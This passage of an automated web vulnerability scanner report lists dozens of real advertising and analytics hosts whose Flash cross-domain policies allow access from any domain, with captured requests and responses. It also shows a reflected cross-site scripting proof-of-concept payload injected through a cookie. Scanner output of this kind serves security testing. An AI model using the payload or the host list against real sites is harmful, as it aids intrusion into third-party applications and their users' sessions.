           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3OVb2YWRTJR8rMAg==5d362<script>alert(1)</script>cdc158780ac
userid:
</div>
...[SNIP]...

7. Flash cross-domain policy  previous  next
There are 60 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


7.1. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sat, 14 May 2011 14:23:44 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.2. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Sat, 14 May 2011 18:04:18 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.3. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Mon, 13 Jun 2011 18:04:19 GMT
X-FB-Server: 10.32.59.125
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

7.4. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:21:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Sat, 14 May 2011 20:21:39 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

7.5. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Sun, 15 May 2011 18:10:09 GMT
Date: Sat, 14 May 2011 18:10:09 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

7.6. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
ETag: W/"384-1279205345000"
Last-Modified: Thu, 15 Jul 2010 14:49:05 GMT
Content-Type: application/xml
Content-Length: 384
Date: Sat, 14 May 2011 14:21:34 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.7. http://c7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "77adf2-f7-44d91a5da81c0"
X-Varnish: 1215537576
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2321
Date: Sat, 14 May 2011 14:21:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.8. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 619922229
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1385
Date: Sat, 14 May 2011 13:59:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.9. http://d8.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d8.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d8.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Sat, 14 May 2011 13:58:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.10. http://dis.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sat, 14 May 2011 14:18:59 GMT
Expires: Tue, 08 May 2012 14:18:59 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.11. http://dis.us.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sat, 14 May 2011 14:18:03 GMT
Expires: Tue, 08 May 2012 14:18:03 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

7.12. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 14 May 2011 22:34:19 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.13. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 14 May 2011 02:39:33 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 42244
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.14. http://hosted.newsgator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hosted.newsgator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: hosted.newsgator.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 802
Content-Type: text/xml
Last-Modified: Wed, 10 Sep 2008 16:54:56 GMT
Accept-Ranges: bytes
ETag: "c11fe6f36513c91:263"
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 18:04:27 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <allow-access-from domain="*.usatoday.com" secure="true"/>
   <allow-access-from domain="*.usatoday.net" secure="true"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="feeds.feedburner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zap2it.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.proofmyproject.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sliceoflime.com" secure="true"/>
...[SNIP]...

7.15. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 15-May-2011 14:21:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Fri, 12-Aug-2011 14:21:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.16. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 14 May 2011 14:23:40 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.17. http://images.zwire.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images.zwire.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.zwire.com

Response

HTTP/1.0 200 OK
ETag: "f612d87b65e3c71:42aa"
Accept-Ranges: bytes
Content-Length: 128
Last-Modified: Mon, 20 Aug 2007 20:05:41 GMT
X-Server: 15
X-Cache-Info: caching
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/xml
Cache-Control: max-age=1800
Date: Sat, 14 May 2011 22:29:19 GMT
Connection: close

<?xml version="1.0"?>
<!-- Are You Hungry -->
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.18. http://img-cdn.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img-cdn.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Sun, 15 May 2011 11:29:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.19. http://img.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:04:18 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.20. http://m8.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m8.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m8.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
X-Varnish: 1869850705
Date: Sat, 14 May 2011 13:58:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.21. http://media2.legacy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

7.22. http://metrics.blackberry.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 14:23:37 GMT
Server: Omniture DC/2.0.0
xserver: www300
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.23. http://nmp.newsgator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: nmp.newsgator.com

Response

HTTP/1.0 200 OK
Content-Length: 802
Content-Type: text/xml
Last-Modified: Wed, 10 Sep 2008 16:54:56 GMT
Accept-Ranges: bytes
ETag: "c11fe6f36513c91:21fa"
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR CUR IVDo OUR BUS UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=600
Date: Sat, 14 May 2011 18:04:23 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <allow-access-from domain="*.usatoday.com" secure="true"/>
   <allow-access-from domain="*.usatoday.net" secure="true"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="feeds.feedburner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.zap2it.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.proofmyproject.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sliceoflime.com" secure="true"/>
...[SNIP]...

7.24. http://omni.accenture.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omni.accenture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omni.accenture.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:59:41 GMT
Server: Omniture DC/2.0.0
xserver: www290
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

7.25. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"211-1300735657000"
Last-Modified: Mon, 21 Mar 2011 19:27:37 GMT
Content-Type: application/xml
Content-Length: 211
Date: Sat, 14 May 2011 18:35:10 GMT
Connection: close
Server: 33XG1

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

7.26. http://platform.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://platform.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: platform.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 14 May 2011 14:24:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.27. http://r1.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:06:34 GMT
ETag: "2438668-f7-44d91ae237a80"
Accept-Ranges: bytes
Content-Length: 247
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Date: Sat, 14 May 2011 13:59:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

7.28. http://search.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

